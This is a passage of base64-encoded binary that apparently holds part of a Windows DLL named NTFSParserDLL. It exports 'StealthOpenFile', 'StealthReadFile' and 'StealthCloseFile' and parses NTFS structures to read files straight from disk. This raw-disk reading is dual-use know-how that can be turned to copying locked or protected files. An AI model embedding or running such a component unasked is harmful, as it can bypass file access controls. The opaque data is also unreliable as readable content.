VsZWFzZVxOVEZTUGFyc2VyRExMLnBkYgAAAAAAAI0AAACNAAAAAAAAABxwARAAAAAAAAAAAP////8AAAAAQAAAAOBFARAAAAAAAAAAAAEAAADwRQEQxEUBEAAAAAAAAAAAAAAAAAAAAAAAcAEQDEYBEAAAAAAAAAAAAgAAABxGARAoRgEQxEUBEAAAAAAAcAEQAQAAAAAAAAD/////AAAAAEAAAAAMRgEQAAAAAAAAAAAAAAAAOHABEFhGARAAAAAAAAAAAAIAAABoRgEQdEYBEMRFARAAAAAAOHABEAEAAAAAAAAA/////wAAAABAAAAAWEYBEAAAAAAAAAAAAAAAAFhwARCkRgEQAAAAAAAAAAADAAAAtEYBEMRGARB0RgEQxEUBEAAAAABYcAEQAgAAAAAAAAD/////AAAAAEAAAACkRgEQAAAAAAAAAAAAAAAAeHABEPRGARAAAAAAAAAAAAMAAAAERwEQFEcBEHRGARDERQEQAAAAAHhwARACAAAAAAAAAP////8AAAAAQAAAAPRGARAAAAAAAAAAAAAAAACgcAEQREcBEAAAAAAAAAAAAQAAAFRHARBcRwEQAAAAAKBwARAAAAAAAAAAAP////8AAAAAQAAAAERHARAAAAAAAAAAAAAAAAAccAEQ4EUBEAAAAAAAAAAAAAAAAPB5ARCgRwEQAAAAAAAAAAACAAAAsEcBELxHARDERQEQAAAAAPB5ARABAAAAAAAAAP////8AAAAAQAAAAKBHARAAAAAAAAAAAAEAAACYSAEQyH4BEAAAAAAAAAAA/////wAAAABAAAAA2EcBEAAAAAAAAAAAAwAAABRIARCgSAEQOEgBEOhHARAAAAAAAAAAAAAAAAAAAAAA7H4BEOxIARDsfgEQAQAAAAAAAAD/////AAAAAEAAAADsSAEQcH4BEAIAAAAAAAAA/////wAAAABAAAAAvEgBEAAAAAAAAAAAAAAAAMh+ARDYRwEQAAAAAAAAAAAAAAAAcH4BELxIARDoRwEQAAAAAJx+ARACAAAAAAAAAP////8AAAAAQAAAAARIARAAAAAAAAAAAAMAAAD8SAEQAAAAAAAAAAAAAAAAnH4BEARIARA4SAEQ6EcBEAAAAAAAAAAAAAAAAAIAAADgSAEQVEgBEDhIARDoRwEQAAAAAERKARAgTAEQAE0BEAAAAABgSgEQBEwBEABNARAAAAAAfEoBECBMARAATQEQAAAAAJhKARAETAEQAE0BEAAAAAC0SgEQIEwBEABNARAAAAAA0EoBEARMARAATQEQAAAAAOxKARAAAAAACEsBEARMARAATQEQAAAAAEBLARAgTAEQAE0BECRLARAAAAAAXEsBEDxMARAAAAAAeEsBECBMARAATQEQAAAAAJRLARAgTAEQAE0BEAAAAADMSwEQIEwBEABNARCwSwEQAAAAAOhLARAgTAEQAE0BEAAAAAAETAEQAE0BEAAAAAAgTAEQAE0BEAAAAAA8TAEQAAAAAFhMARAAAAAAdEwBEAAAAACQTAEQAAAAAKxMARAAAAAAyEwBEORMARAAAAAA5EwBEAAAAAAATQEQAAAAABh/ARACAAAAAAAAAP////8AAAAAQAAAABxNARBIfwEQAgAAAAAAAAD/////AAAAAEAAAAAsTQEQfH8BEAIAAAAAAAAA/////wAAAABAAAAAPE0BEKh/ARACAAAAAAAAAP////8AAAAAQAAAAExNARDYfwEQAgAAAAAAAAD/////AAAAAEAAAABcTQEQCIABEAIAAAAAAAAA/////wAAAABAAAAAbE0BEDyAARAAAAAAAAAAAP////8AAAAAQAAAAHxNARBkgAEQAgAAAAAAAAD/////AAAAAEAAAACMTQEQcIEBEAAAAAAoAAAA/////wAAAABAAAAAHE4BEISAARADAAAAAAAAAP////8AAAAAQAAAAJxNARCkgAEQAQAAAAAAAAD/////AAAAAEAAAACsTQEQwIABEAIAAAAAAAAA/////wAAAABAAAAAvE0BENyAARACAAAAAAAAAP////8AAAAAQAAAAMxNARAgggEQAAAAACgAAAD/////AAAAAEAAAABsTgEQ+IABEAMAAAAAAAAA/////wAAAABAAAAA3E0BEBiBARACAAAAAAAAAP////8AAAAAQAAAAOxNARA0gQEQAQAAAAAAAAD/////AAAAAEAAAAD8TQEQVIEBEAEAAAAAAAAA/////wAAAABAAAAADE4BEHCBARAAAAAAAAAAAP////8AAAAAQAAAABxOARCYgQEQAAAAAAAAAAD/////AAAAAEAAAAAsTgEQxIEBEAAAAAAAAAAA/////wAAAABAAAAAPE4BEOiBARAAAAAAAAAAAP////8AAAAAQAAAAExOARAEggEQAAAAAAAAAAD/////AAAAAEAAAABcTgEQOIIBEAEAAAAAAAAA/////wAAAABAAAAAfE4BECCCARAAAAAAAAAAAP////8AAAAAQAAAAGxOARBUggEQAAAAAAAAAAD/////AAAAAEAAAACMTgEQAAAAAAAAAAADAAAADEkBEAAAAAAAAAAAAwAAABxJARAAAAAAAAAAAAMAAAAsSQEQAAAAAAAAAAADAAAAPEkBEAAAAAAAAAAAAwAAAExJARAAAAAAAAAAAAMAAABcSQEQAAAAAAAAAAABAAAAbEkBEAAAAAAAAAAAAwAAAHRJARAAAAAAAQAAAAQAAACESQEQAAAAAAAAAAACAAAAmEkBEAAAAAAAAAAAAwAAAKRJARAAAAAAAAAAAAMAAAC0SQEQAAAAAAEAAAAEAAAAxEkBEAAAAAAAAAAAAwAAANhJARAAAAAAAAAAAAIAAADoSQEQAAAAAAAAAAACAAAA9EkBEAAAAAAAAAAAAQAAAABKARAAAAAAAAAAAAEAAAAISgEQAAAAAAAAAAABAAAAEEoBEAAAAAAAAAAAAQAAABhKARAAAAAAAAAAAAEAAAAgSgEQAAAAAAAAAAABAAAANEoBEAAAAAAAAAAAAgAAAChKARAAAAAAAAAAAAEAAAA8SgEQAAAAAAAAAAAAAAAAGH8BEBxNARAAAAAAAAAAAAAAAABIfwEQLE0BEAAAAAAAAAAAAAAAAHx/ARA8TQEQAAAAAAAAAAAAAAAAqH8BEExNARAAAAAAAAAAAAAAAADYfwEQXE0BEAAAAAAAAAAAAAAAAAiAARBsTQEQAAAAAAAAAAAAAAAAPIABEHxNARAAAAAAAAAAAAAAAABkgAEQjE0BEAAAAAAoAAAAAAAAAISAARCcTQEQAAAAAAAAAAAAAAAAhIABEJxNARAAAAAAAAAAAAAAAACkgAEQrE0BEAAAAAAAAAAAAAAAAMCAARC8TQEQAAAAAAAAAAAAAAAA3IABEMxNARAAAAAAKAAAAAAAAAD4gAEQ3E0BEAAAAAAAAAAAAAAAAPiAARDcTQEQAAAAAAAAAAAAAAAAIIIBEGxOARAAAAAAAAAAAAAAAAAYgQEQ7E0BEAAAAAAAAAAAAAAAADSBARD8TQEQAAAAAAAAAAAAAAAAVIEBEAxOARAAAAAAAAAAAAAAAABwgQEQHE4BEAAAAAAAAAAAAAAAAJiBARAsTgEQAAAAAAAAAAAAAAAAxIEBEDxOARAAAAAAAAAAAAAAAADogQEQTE4BEAAAAAAAAAAAAAAAAASCARBcTgEQAAAAAAAAAAAAAAAAOIIBEHxOARAAAAAAAAAAAAAAAABUggEQjE4BEAAAAAAAAAAAAAAAAExqAAB9agAA8HUAALC8AADw2gAAUOYAAHDmAACu5gAA/uYAADjnAABo5wAAo+cAANPnAAAD6AAAKOgAAH/oAAC46AAA6OgAACbpAAC+6QAA6+kAACPqAABL6gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAeE8AEAAAAAAwUQEQAgAAADxRARBYUQEQAAAAAABwARAAAAAA/////wAAAAAMAAAADE8AEAAAAAAccAEQAAAAAP////8AAAAADAAAAG9uABAAAAAAOHABEAAAAAD/////AAAAAAwAAABCTwAQAAAAAINPABAAAAAAoFEBEAMAAACwUQEQdFEBEFhRARAAAAAAWHABEAAAAAD/////AAAAAAwAAAAnTwAQAAAAAINPABAAAAAA3FEBEAMAAADsUQEQdFEBEFhRARAAAAAAeHABEAAAAAD/////AAAAAAwAAABdTwAQ/v///wAAAADU////AAAAAP7///8AAAAAKlcAEAAAAAD+////AAAAAND///8AAAAA/v///wAAAAC+XAAQAAAAAP7///8AAAAA1P///wAAAAD+////AAAAAC1dABAAAAAA/v///wAAAADM////AAAAAP7///9sXQAQlV0AEAAAAAD+////AAAAANj///8AAAAA/v///wAAAADsYAAQAAAAAP7///8AAAAA1P///wAAAAD+////hGIAEJ5iABAAAAAA/v///wAAAADE////AAAAAP7///8AAAAAX3QAEAAAAAD+////AAAAANT///8AAAAA/v///wAAAABEewAQAAAAAP7///8AAAAA1P///wAAAAD+////AAAAAAd/ABAAAAAA/v///wAAAADU////AAAAAP7///8AAAAAsoIAEAAAAAD+////AAAAAND///8AAAAA/v///wAAAAAzhAAQAAAAAP7///8AAAAA2P///wAAAAD+////AAAAAAGIABD+////AAAAAA2IABD+////AAAAANj///8AAAAA/v///wAAAABxiQAQ/v///wAAAACAiQAQ/v///wAAAADY////AAAAAP7///+ijQAQpo0AEAAAAAD+////AAAAANj///8AAAAA/v///26NABByjQAQAAAAAP7///8AAAAA2P///wAAAAD+////AAAAANKOABAAAAAA/v///wAAAAB8////AAAAAP7///8AAAAA86IAEAAAAAD+////AAAAAND///8AAAAA/v///wAAAABFtAAQAAAAAAq0ABAUtAAQ/v///wAAAACw////AAAAAP7///8AAAAAO6oAEAAAAACHqQAQkakAEP7///8AAAAA2P///wAAAAD+////qbEAEK2xABAAAAAA/v///wAAAADY////AAAAAP7///98qAAQhagAEEAAAAAAAAAAAAAAAOiqABD/////AAAAAP////8AAAAAAAAAAAAAAAABAAAAAQAAAMRUARAiBZMZAgAAANRUARABAAAA5FQBEAAAAAAAAAAAAAAAAAEAAAAAAAAA/v///wAAAADU////AAAAAP7///8nswAQK7MAEAAAAADCqAAQAAAAAExVARACAAAAWFUBEFhRARAAAAAA8HkBEAAAAAD/////AAAAAAwAAACnqAAQAAAAAP7///8AAAAA2P///wAAAAD+////AAAAABm3ABAAAAAA/v///wAAAADY////AAAAAP7///9JuAAQXLgAEAAAAAD+////AAAAALz///8AAAAA/v///wAAAAB4ugAQAAAAAP7///8AAAAA0P///wAAAAD+////AAAAAFfOABAAAAAA/v///wAAAADI////AAAAAP7///8AAAAAedcAEAAAAAD+////AAAAAMz///8AAAAA/v///wAAAACn3QAQAAAAAAAAAABx3QAQ/v///wAAAADQ////AAAAAP7///8AAAAARd8AEAAAAAD+////AAAAANj///8AAAAA/v///wAAAADR3wAQAAAAAP7///8AAAAAzP///wAAAAD+////AAAAACrjABAAAAAA/v///wAAAADU////AAAAAP7///8AAAAAJuQAEAAAAAD+////AAAAAND///8AAAAA/v///wAAAAA/5QAQIgWTGQQAAAAAVwEQAgAAACBXARAAAAAAAAAAAAAAAAABAAAA/////wAAAAD/////AAAAAAEAAAAAAAAAAQAAAAAAAAACAAAAAgAAAAMAAAABAA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5kbGVkRXhjZXB0aW9uRmlsdGVyAAClBFNldFVuaGFuZGxlZEV4Y2VwdGlvbkZpbHRlcgDjAkluaXRpYWxpemVDcml0aWNhbFNlY3Rpb25BbmRTcGluQ291bnQAwAFHZXRDdXJyZW50UHJvY2VzcwDABFRlcm1pbmF0ZVByb2Nlc3MAAMUEVGxzQWxsb2MAAMcEVGxzR2V0VmFsdWUAyARUbHNTZXRWYWx1ZQDGBFRsc0ZyZWUAYwJHZXRTdGFydHVwSW5mb1cAGAJHZXRNb2R1bGVIYW5kbGVXAABKAkdldFByb2Nlc3NIZWFwAADzAUdldEZpbGVUeXBlANEARGVsZXRlQ3JpdGljYWxTZWN0aW9uABMCR2V0TW9kdWxlRmlsZU5hbWVBAACnA1F1ZXJ5UGVyZm9ybWFuY2VDb3VudGVyAMEBR2V0Q3VycmVudFByb2Nlc3NJZAB5AkdldFN5c3RlbVRpbWVBc0ZpbGVUaW1lANoBR2V0RW52aXJvbm1lbnRTdHJpbmdzVwAAYQFGcmVlRW52aXJvbm1lbnRTdHJpbmdzVwDuAEVudGVyQ3JpdGljYWxTZWN0aW9uAAA5A0xlYXZlQ3JpdGljYWxTZWN0aW9uAAA+A0xvYWRMaWJyYXJ5RXhXAADSAkhlYXBSZUFsbG9jAIoDT3V0cHV0RGVidWdTdHJpbmdXAAA/A0xvYWRMaWJyYXJ5VwAALQNMQ01hcFN0cmluZ1cAAJoBR2V0Q29uc29sZUNQAACsAUdldENvbnNvbGVNb2RlAABnBFNldEZpbGVQb2ludGVyRXgAAIcEU2V0U3RkSGFuZGxlAAAkBVdyaXRlQ29uc29sZVcAVwFGbHVzaEZpbGVCdWZmZXJzAACPAENyZWF0ZUZpbGVXAAAAAAAAAAAA0BUUUgAAAAAmYQEAAQAAAAMAAAADAAAACGEBABRhAQAgYQEAQEIAAIA+AACAQQAAOGEBAElhAQBZYQEAAAABAAIATlRGU1BhcnNlckRMTC5kbGwAU3RlYWx0aENsb3NlRmlsZQBTdGVhbHRoT3BlbkZpbGUAU3RlYWx0aFJlYWRGaWxlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAAAAAAEAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbcABAW3AAQFtwAEBbcABAW3AAQFtwAEBbcABAW3AAQFtwAEBbcABAAAAAAAAAAAGh7ARAuAAAAZHsBEDyQARA8kAEQPJABEDyQARA8kAEQPJABEDyQARA8kAEQPJABEH9/f39/f39/uHsBEECQARBAkAEQQJABEECQARBAkAEQQJABEECQARAuAAAAAAAAAIg7ARCKPQEQgJABEAAAAACAkAEQAQEAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAWTGQAAAAAAAAAAAAAAAP7///8AAAAAAAAAAAAAAACk/wAQAAAAAC4/QVZfSW9zdHJlYW1fZXJyb3JfY2F0ZWdvcnlAc3RkQEAAAKT/ABAAAAAALj9BVl9TeXN0ZW1fZXJyb3JfY2F0ZWdvcnlAc3RkQEAAAAAApP8AEAAAAAAuP0FWZXJyb3JfY2F0ZWdvcnlAc3RkQEAAAAAApP8AEAAAAAAuP0FWX0dlbmVyaWNfZXJyb3JfY2F0ZWdvcnlAc3RkQEAAAACk/wAQAAAAAC4/QVY/JENBdHRyX0JpdG1hcEBWQ0F0dHJSZXNpZGVudEBAQEAAAACk/wAQAAAAAC4/QVY/JENBdHRyX0JpdG1hcEBWQ0F0dHJOb25SZXNpZGVudEBAQEAAAAAApP8AEAAAAAAuP0FWPyRDQXR0cl9EYXRhQFZDQXR0clJlc2lkZW50QEBAQACk/wAQAAAAAC4/QVY/JENBdHRyX0RhdGFAVkNBdHRyTm9uUmVzaWRlbnRAQEBAAACk/wAQAAAAAC4/QVY/JENBdHRyX0F0dHJMaXN0QFZDQXR0clJlc2lkZW50QEBAQACk/wAQAAAAAC4/QVY/JENBdHRyX0F0dHJMaXN0QFZDQXR0ck5vblJlc2lkZW50QEBAQAAApP8AEAAAAAAuP0FWPyRDU0xpc3RAVkNGaWxlUmVjb3JkQEBAQAAAAKT/ABAAAAAALj9BVkNBdHRyX0luZGV4QWxsb2NAQAAApP8AEAAAAAAuP0FWQ0F0dHJfSW5kZXhSb290QEAAAACk/wAQAAAAAC4/QVZDSW5kZXhCbG9ja0BAAAAApP8AEAAAAAAuP0FWQ0F0dHJfVm9sTmFtZUBAAKT/ABAAAAAALj9BVkNBdHRyX1ZvbEluZm9AQACk/wAQAAAAAC4/QVZDQXR0cl9GaWxlTmFtZUBAAAAAAKT/ABAAAAAALj9BVkNBdHRyX1N0ZEluZm9AQACk/wAQAAAAAC4/QVZDQXR0ck5vblJlc2lkZW50QEAAAKT/ABAAAAAALj9BVkNBdHRyUmVzaWRlbnRAQACk/wAQAAAAAC4/QVY/JENTTGlzdEBWQ0luZGV4RW50cnlAQEBAAAAApP8AEAAAAAAuP0FWPyRDU0xpc3RAVXRhZ0RhdGFSdW5fRW50cnlAQEBAAACk/wAQAAAAAC4/QVY/JENTTGlzdEBWQ0F0dHJCYXNlQEBAQACk/wAQAAAAAC4/QVZDRmlsZVJlY29yZEBAAAAApP8AEAAAAAAuP0FWQ05URlNWb2x1bWVAQAAAAKT/ABAAAAAALj9BVkNGaWxlTmFtZUBAAKT/ABAAAAAALj9BVkNJbmRleEVudHJ5QEAAAACk/wAQAAAAAC4/QVZDQXR0ckJhc2VAQABI/wAQEP8AECz/ABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA